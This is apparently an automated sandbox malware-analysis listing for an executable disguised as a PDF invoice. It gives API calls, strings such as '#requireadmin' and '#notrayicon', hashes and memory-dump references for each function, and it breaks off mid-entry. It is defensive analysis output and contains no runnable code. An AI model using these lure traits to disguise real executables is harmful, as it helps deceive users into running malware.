Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe
API String ID: 2506810119-2467509811
Opcode ID: b4561e3ece174b7b87abf092e99de7caf8d94870fbd739fdd3e471e05f8cf732
Instruction ID: e6daf98204c1486b4033c53dace1f45ae52d7552e79a54cd432265da8d768396
Opcode Fuzzy Hash: b4561e3ece174b7b87abf092e99de7caf8d94870fbd739fdd3e471e05f8cf732
Instruction Fuzzy Hash: 4C318371A40258ABEB21DB9A9C81D9FBBFCEB85310B1441ABF504A7221D6744A80CB98

Function 0047C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0047C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0047C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004E1990,00E55B90), ref: 0047C395

Strings

0, xrefs: 0047C2DF

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 861342acafa3479daa35de97740a82bca3f1f25c9ee3e0d31f31d9a706338fd6
Instruction ID: ca7b83f462996cfa4db5589584a919406778e3f4ac46951a50779401c90e84e1
Opcode Fuzzy Hash: 861342acafa3479daa35de97740a82bca3f1f25c9ee3e0d31f31d9a706338fd6
Instruction Fuzzy Hash: 2E418F712043019FD720DF25D884B9ABBE8AB85324F14C61EFDA9972D1D778A904CB6A

Function 004A4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,004ACC08,00000000,?,?,?,?), ref: 004A44AA
GetWindowLongW.USER32 ref: 004A44C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004A44D7

Strings

SysTreeView32, xrefs: 004A447C

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 880e6787fa4053b923dd72c85b75bc62b710673df055dd979284f2a8ff52493d
Instruction ID: e45ae8497fde00ea699975e0baa6b1a08c5326ba50c8acc82a69c4faa1a0856d
Opcode Fuzzy Hash: 880e6787fa4053b923dd72c85b75bc62b710673df055dd979284f2a8ff52493d
Instruction Fuzzy Hash: A831B231200205AFDB208F78DC45BDB7BA9EB9A338F20472AF975922D0D7B8EC509754

Function 00476E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00476EED
VariantCopyInd.OLEAUT32(?,?), ref: 00476F08
VariantClear.OLEAUT32(?), ref: 00476F12

Strings

*jG, xrefs: 00476E8B, 00476E90, 00476EF8

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *jG
API String ID: 2173805711-3174124858
Opcode ID: 532eaa85fe75b0e4e21517a9be614e7ddc8613fb8b063b750d59b156a4094bf4
Instruction ID: ca92d3ab91f30acc51170f67dcaca04aec4c3d6986c15e87d1a0a1d2b614d77a
Opcode Fuzzy Hash: 532eaa85fe75b0e4e21517a9be614e7ddc8613fb8b063b750d59b156a4094bf4
Instruction Fuzzy Hash: 8F319071704606DBCB04AF65E8909FE3777EF45308B1144AAF90A4B2A1C7389952DBDD

Function 0049304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0049335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00493077,?,?), ref: 00493378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0049307A
_wcslen.LIBCMT ref: 0049309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00493106

Strings

255.255.255.255, xrefs: 00493095, 0049309A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: b846ea03849b7cf3a037420d21f80fadcfd4415dea69e6d5f869bc7357fa7a48
Instruction ID: 2309739ad176778b1fbb4edccff78af1228bb4c28be928dd8ee4c6289cc451b6
Opcode Fuzzy Hash: b846ea03849b7cf3a037420d21f80fadcfd4415dea69e6d5f869bc7357fa7a48
Instruction Fuzzy Hash: A331D5352002019FCF20DF69C486EAA7FE0EF56319F24806AE9158B3A2D779EE45C765

Function 004A4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004A4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004A4713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004A471A

Strings

msctls_updown32, xrefs: 004A4684

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: d4944e9b556eb0b9e5f146698d3d0f3c0d53e2fd79fa4ba854c3605969a50de7
Instruction ID: 342302416842dbe5e8a820cf96fba1abf55ab34af325e8514b308ddfa1708659
Opcode Fuzzy Hash: d4944e9b556eb0b9e5f146698d3d0f3c0d53e2fd79fa4ba854c3605969a50de7
Instruction Fuzzy Hash: CD2162B5601244AFDB10DF68DCC1DBB37ADEB9B398B04005AFA009B361DB74EC51CA64

Function 004795AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0047961D

Strings

#OnAutoItStartRegister, xrefs: 004795F3
#requireadmin, xrefs: 004795D9
#notrayicon, xrefs: 004795B7

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: d7e4b2e92f080f6035a0617a9824785072806b6a774c1374d11bcad854b21a99
Instruction ID: aa405bb422afbe7927a0bb2e7d602d9b8112f0a1fb63b39fa494f1d455cd9b62
Opcode Fuzzy Hash: d7e4b2e92f080f6035a0617a9824785072806b6a774c1374d11bcad854b21a99
Instruction Fuzzy Hash: 06212E7210462166D331AB269C02FF773E89F65314F54802FF94D97241EB5DAD45C29D

Function 004A37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004A3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004A3850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004A3876

Strings

Listbox, xrefs: 004A380F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 4774221057044af95b8dc44b54bbd4d565a11c2dd4b0e2acd17bb3da107af83f
Instruction ID: bdf332832c4d3c633d1f203710be3d44e1e59fcd21e73d3262a835f34456e84d
Opcode Fuzzy Hash: 4774221057044af95b8dc44b54bbd4d565a11c2dd4b0e2acd17bb3da107af83f
Instruction Fuzzy Hash: 862107726001187BEF11DF54CC80FBB376EEF9A754F10812AF9009B290D679DC518794

Function 004849F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00484A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00484A5C
SetErrorMode.KERNEL32(00000000,?,?,004ACC08), ref: 00484AD0

Strings

%lu, xrefs: 00484A6F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: fa5d26eb0e0566b1e5d05ecefd26c460b1112efcd8688c8e78f352778cbdedf0
Instruction ID: c4e3ee8dfc34bc2c52ffc4d8305aea6d59b9c2d21503e4231c32b609fe6cbba1
Opcode Fuzzy Hash: fa5d26eb0e0566b1e5d05ecefd26c460b1112efcd8688c8e78f352778cbdedf0
Instruction Fuzzy Hash: 0D318075A00109AFD710DF54C885EAE7BF8EF49308F1480AAE809DB352DB75ED45CB65

Function 004A41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004A424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004A4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004A4271

Strings

msctls_trackbar32, xrefs: 004A4226

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 803734ff345fb930105773d849f1d0ed670929e1412b7aff903d1749a56e7ad4
Instruction ID: d34ff235fa9ffbdd703f64f95d5d4ad6ceb2d31c266f3ebcbd5deaee30c8d840
Opcode Fuzzy Hash: 803734ff345fb930105773d849f1d0ed670929e1412b7aff903d1749a56e7ad4
Instruction Fuzzy Hash: 6A113A322402087EEF205F25CC45FAB3BACEFD6764F010126FA40E6190D2B5DC518B18

Function 00472F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00416B57: _wcslen.LIBCMT ref: 00416B6A

Part of subcall function 00472DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00472DC5
Part of subcall function 00472DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00472DD6
Part of subcall function 00472DA7: GetCurrentThreadId.KERNEL32 ref: 00472DDD
Part of subcall function 00472DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00472DE4

GetFocus.USER32 ref: 00472F78

Part of subcall function 00472DEE: GetParent.USER32(00000000), ref: 00472DF9

GetClassNameW.USER32(?,?,00000100), ref: 00472FC3
EnumChildWindows.USER32(?,0047303B), ref: 00472FEB

Strings

%s%d, xrefs: 00472FFF

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 938b035bf15ce9bc11b5fdff85247d92f06d5eca47bf9eac341b8ee427d3f23e
Instruction ID: 7cba6459d84f60ebceb6e958ef49e9b8f75ae700e1641ecb818d52fbb0678e4f
Opcode Fuzzy Hash: 938b035bf15ce9bc11b5fdff85247d92f06d5eca47bf9eac341b8ee427d3f23e
Instruction Fuzzy Hash: 0911E4B16002056BCF50BF718CC5FEE376AAF84308F04807BF90D9B252DE7899499B68

Function 004A5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004A58C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004A58EE
DrawMenuBar.USER32(?), ref: 004A58FD

Strings

0, xrefs: 004A588F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 8db07672d7417c48473b51180c3fea6981a9383a167ad3d9830b545b547ec91b
Instruction ID: 6cce3f63e860bbd74be7087d248058969e21914c936b1b22677b24cb85b8bc67
Opcode Fuzzy Hash: 8db07672d7417c48473b51180c3fea6981a9383a167ad3d9830b545b547ec91b
Instruction Fuzzy Hash: 68018471500218EFDB519F11EC44BAFBBB8FF46360F1080AAF849DA251DB348A84DF25

Function 0046D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0046D3BF
FreeLibrary.KERNEL32 ref: 0046D3E5

Strings

X64, xrefs: 0046D2A8
GetSystemWow64DirectoryW, xrefs: 0046D3B9

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: f1f536a6f2a6af520e501bc44b8f85bf0ddf890d1d1d9cf08b3cb1e71b5a83b9
Instruction ID: eb3fd32eb4a23ec234452eacef63ff6ae43b5d4cafe3d40ef5ada43a0b1292ec
Opcode Fuzzy Hash: f1f536a6f2a6af520e501bc44b8f85bf0ddf890d1d1d9cf08b3cb1e71b5a83b9
Instruction Fuzzy Hash: C3F055B1F05A208BD7B102115CB4AAA3720AF11702B98C1A7EC02E9308F72CCC818ADF

Function 0047007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4e7a76b08c311a0456e80ac93ce77fd7f81d2607a6960046681a79c580d8619
Instruction ID: 30904cbb3f1f7f3b0e0d26bc88f3c04b36d29190e2af97f3209cc02610a4562d
Opcode Fuzzy Hash: b4e7a76b08c311a0456e80ac93ce77fd7f81d2607a6960046681a79c580d8619
Instruction Fuzzy Hash: 64C16C75A0120AEFDB14CFA4C894EAEB7B5FF48304F208599E909EB251D735ED42CB94

Function 0049342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00493459
CoUninitialize.OLE32 ref: 00493463
VariantInit.OLEAUT32(?), ref: 0049346E
VariantClear.OLEAUT32(?), ref: 0049371B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: f9f97a1fa3f19f5c945d8d5aff214f2531aab5e2690341c61c07aea3e423f413
Instruction ID: 35e2ece6c6adc5468c17c6a0e55e15e1f88f114d03215012f1905c35e75a5f7d
Opcode Fuzzy Hash: f9f97a1fa3f19f5c945d8d5aff214f2531aab5e2690341c61c07aea3e423f413
Instruction Fuzzy Hash: 4DA16E75204300AFCB10DF25C485A5ABBE5FF89719F04885EF94A9B362DB38ED41CB5A

Function 00470436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,004AFC08,?), ref: 004705F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,004AFC08,?), ref: 00470608
CLSIDFromProgID.OLE32(?,?,00000000,004ACC40,000000FF,?,00000000,00000800,00000000,?,004AFC08,?), ref: 0047062D
_memcmp.LIBVCRUNTIME ref: 0047064E

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 2985eaf707ccea7362efab06617d44c55fc5494a8024b338482b27c73f0ad47b
Instruction ID: 6666d4d76a5eabef93e750efca45d4cb71ebea393a0ee7ec06c185f2e6e5e93f
Opcode Fuzzy Hash: 2985eaf707ccea7362efab06617d44c55fc5494a8024b338482b27c73f0ad47b
Instruction Fuzzy Hash: CB813971A00109EFCB04DF94C984EEEB7B9FF89315F208159F506AB250DB75AE06CB64

Function 00451391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004514C0

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 8d07611b345f147778ec4bee98ff6eab5d28410972cbdfc56c99cc14b695cf94
Instruction ID: 9b124a8551b40aada1c48fc126a7b84a76fc1153a0df3f8410306c87279c5abc
Opcode Fuzzy Hash: 8d07611b345f147778ec4bee98ff6eab5d28410972cbdfc56c99cc14b695cf94
Instruction Fuzzy Hash: 52414131900100A7EB256BBA8C45B6F3AA4EF47379F14126BFC14D62F3E67C48495269

Function 004A6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00E5EEC0,?), ref: 004A62E2
ScreenToClient.USER32(?,?), ref: 004A6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 004A6382

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 4825c11e2167e88004f225f39307592f56ba0d89aacb7d7a96589b554e058f78
Instruction ID: 11bd6ad433e23e12338e730dfdeedd3a83641ac58d97fca0e4aa8655945ee193
Opcode Fuzzy Hash: 4825c11e2167e88004f225f39307592f56ba0d89aacb7d7a96589b554e058f78
Instruction Fuzzy Hash: 77515C75A00209EFCF10DF68D880AAE7BB5EB66360F15816AF8159B3A1D734ED81CB54

Function 00491AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00491AFD
WSAGetLastError.WSOCK32 ref: 00491B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00491B8A
WSAGetLastError.WSOCK32 ref: 00491B94

Memory Dump Source

